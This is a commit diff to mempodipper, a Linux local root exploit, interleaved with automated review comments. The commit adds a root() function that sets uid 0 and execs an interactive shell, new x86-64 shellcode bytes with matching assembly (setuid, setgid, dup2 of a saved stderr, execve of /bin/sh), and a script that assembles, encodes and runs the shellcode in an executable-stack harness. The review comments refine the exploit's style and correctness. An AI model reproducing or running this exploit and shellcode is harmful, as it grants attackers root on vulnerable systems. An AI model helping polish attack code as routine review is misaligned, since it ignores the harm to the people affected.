-rw-r--r--mempodipper.c21
-rwxr-xr-xrun-shellcode.sh2
-rw-r--r--shellcode-64.s49
3 files changed, 66 insertions, 6 deletions
diff --git a/mempodipper.c b/mempodipper.c
index b5efd53..1fb8cc2 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -113,6 +113,14 @@ int recv_fd()
return fd;
}
+void root()
+{
+ dup2(6, 2);
+ setuid(0);
+ setgid(0);
+ execl("/bin/sh", "sh", "-i", NULL);
+}
+
int main(int argc, char **argv)
{
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
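Review bot: `void root()` on the first added line is an unprototyped (empty-parenthesis) declaration; `void root(void)` is the prototype form and matches the style of `int main(int argc, char **argv)` directly below it. No caller of root() is visible in this commit, and its body is the same sequence that the shellcode-64.s file added in the same commit expresses in assembly, so a header comment should say which of the two is the reference, e.g. `/* C equivalent of shellcode-64.s: restore the stderr saved in fd 6, then exec an interactive sh. */`. If root() is kept only as readable documentation of the shellcode, stating that avoids a reader taking it for dead code. main() continues past the end of this hunk.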
@@ -145,6 +153,7 @@ int main(int argc, char **argv)
return -1;
}
printf("[+] Assigning fd %d to stderr.\n", fd);
+ dup2(2, 6);
dup2(fd, 2);
/*
Here is the asm from my /bin/su.
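Review bot: The added `dup2(2, 6);` hard-codes descriptor 6 with no comment at the call site; the only explanation is in the header of shellcode-64.s ("reopens stderr that was previously saved inside fd 6"), a different file. A comment here keeps the two ends of that contract together: `/* keep a copy of the real stderr in fd 6; the shellcode does dup2(6, 2) to get it back */`. Both dup2 calls ignore their return value, so a pre-existing fd 6 or a failed dup is not reported before the following printf claims success. main() starts and ends outside this hunk.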
@@ -199,16 +208,16 @@ int main(int argc, char **argv)
"\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
#elif defined(__x86_64__)
- // Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-77.php
char shellcode[] =
- "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
- "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
- "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
- "\x58\x0f\x05";
+ "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
+ "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
+ "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
+ "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
+ "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
- printf("[+] Executing su with shellcode. There will be no prompt, so just type commands.\n");
+ printf("[+] Executing su with shellcode.\n");
execl("/bin/su", "su", shellcode, NULL);
} else {
sleep(0.01);
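Review bot: Dropping the shell-storm attribution line leaves the new x86-64 byte string with no stated origin. The same commit adds shellcode-64.s and run-shellcode.sh, which presumably produce these bytes, so the removed comment should be replaced rather than deleted: `// Assembled from shellcode-64.s (see run-shellcode.sh); keep both in sync`. Without it, a later edit to the .s file silently diverges from the bytes compiled into mempodipper.c, and a reader has no way to check that the C string matches the assembly. main() continues past the end of this hunk.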
diff --git a/run-shellcode.sh b/run-shellcode.sh
new file mode 100755
index 0000000..5ffcf39
--- /dev/null
+++ b/run-shellcode.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
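Review bot: The harness text appended on line 2 uses `void main()`, which is not a conforming C signature and warns under -Wall; `int main(void) { ((void (*)(void))buf)(); return 0; }` is the equivalent that compiles cleanly. The pipeline's status is msfencode's, so a nasm assembly failure still leaves the chain running with an empty or partial harness.c; `set -o pipefail` at the top of the script (or assembling to a temporary file first) would stop it. The `-fno-stack-protector -z execstack` flags carry no comment; a note such as `# buf is a file-scope array, so the harness needs an executable data segment (-z execstack)` says why they are there, and presumably the stack-protector flag has no effect on a global buffer — verify.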
diff --git a/shellcode-64.s b/shellcode-64.s
new file mode 100644
index 0000000..2514ed2
--- /dev/null
+++ b/shellcode-64.s
@@ -0,0 +1,49 @@
+BITS 64
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor rdi,rdi
+mov al,0x69
+syscall
+;setgid(0)
+xor rdi,rdi
+mov al,0x6a
+syscall
+;dup2(6, 2)
+mov dil,0x6
+mov sil,0x2
+mov al,0x21
+syscall
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+mov qword rbx,'//bin/sh' ; rbx = //bin/sh
+shr rbx,0x8 ; remove leading / from rbx
+push rbx ; push rbx to stack
+mov rdi,rsp ; set rdi (arg 1) to top of stack
+
+xor rbx,rbx
+mov bx,'-i' ; rbx = '-i'
+push rbx ; push rbx to stack
+mov rcx,rsp ; set rcx to top of stack
+
+xor rax,rax ; rax = 0
+
+; so at this point:
+; rdi is a pointer to '/bin/sh'
+; rcx is a pointer to '-i'
+; rax is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push rax ; push rax to stack
+push rcx ; push rcx to stack
+push rdi ; push rdi to stack
+mov rsi,rsp ; set rsi (arg 2) to top of stack
+
+xor rdx,rdx ; rdx (arg 3) = 0
+
+mov al,0x3b ; al = 0x3b, which is the exec call
+syscall
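Review bot: The comment above the execve block says `execve("//bin/sh", ["//bin/sh", "-i", 0], 0)`, but the `shr rbx,0x8` two lines later drops the low byte (the leading '/') and shifts a zero byte in at the top, so the string actually pushed is "/bin/sh" with a NUL terminator — which is what the later summary comment (`rdi is a pointer to '/bin/sh'`) says. The two comments should agree: `; execve("/bin/sh", ["/bin/sh", "-i", 0], 0)`, and the shift line could read `; drop the leading '/' and NUL-terminate the path`. The header comment also says the code "sets uid and gid to 0" but not that it assumes the saved-stderr convention from mempodipper.c's `dup2(2, 6)`; naming that call site there makes the fd 6 dependency traceable from both files.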